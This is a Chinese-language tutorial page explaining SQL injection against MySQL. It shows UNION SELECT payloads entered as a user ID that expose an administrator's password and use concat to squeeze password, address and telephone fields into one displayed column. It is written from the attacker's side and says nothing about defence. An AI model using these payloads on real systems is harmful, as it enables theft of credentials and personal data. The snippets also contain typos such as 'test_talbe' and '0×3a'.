程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> 關於MYSQL數據庫 >> Mysql數據庫使用concat函數執行SQL注入查詢

Mysql數據庫使用concat函數執行SQL注入查詢

編輯:關於MYSQL數據庫

SQL注入語句有時候會使用替換查詢技術,就是讓原有的查詢語句查不到結果出錯,而讓自己構造的查詢語句執行,並把執行結果代替原有查詢語句查詢結果顯示出來。

例如:原本查詢語句是
復制代碼 代碼如下:
select username,email,content from test_table where user_id=uid;

其中uid,是用戶輸入的。正常顯示結果會出現用戶名,用戶郵箱,用戶留言內容。但是如果uid過濾不嚴,我們可以構造如下SQL語句來獲得任意數據表信息。
復制代碼 代碼如下:
uid=-1 union select username ,password,content from test_talbe where user_id=管理員id;

實際執行就是
復制代碼 代碼如下:
select username,email,content from test_table where user_id=-1 union select username ,password,content from test_talbe where user_id=管理員id;

其中顯示正常用戶emai的地方,變成了顯示管理員的密碼了。

但是,往往事情並不是這麼簡單,首先要找到漏洞,其次構造這種語句時候要考慮各個字段的類型,讓int或samllint類型的字段顯示varchar顯然不合適。最後就是本文要說的。

如果出現問題的SQL語句只有一個或兩個字段怎麼辦,我們想知道很多東西,一兩個字段太少了,遠遠不能滿足我們的需要。那麼我們可以使用concat函數。

concat函數本來是這樣用的SELECT CONCAT('My', 'S', 'QL');執行結果是'MySQL'。也就是連接作用的。我們利用它來為我們服務,
復制代碼 代碼如下:
uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理員id;

這個語句實際查詢了六個字段,但是顯示的時候,把password,sex,address,telephone等字段合在一起,顯示在原本應該顯示email的地方。

更好的方法:中間用分隔符分開:
復制代碼 代碼如下:
uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理員id;

其中0×3a是“:”的十六進 制形式。

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved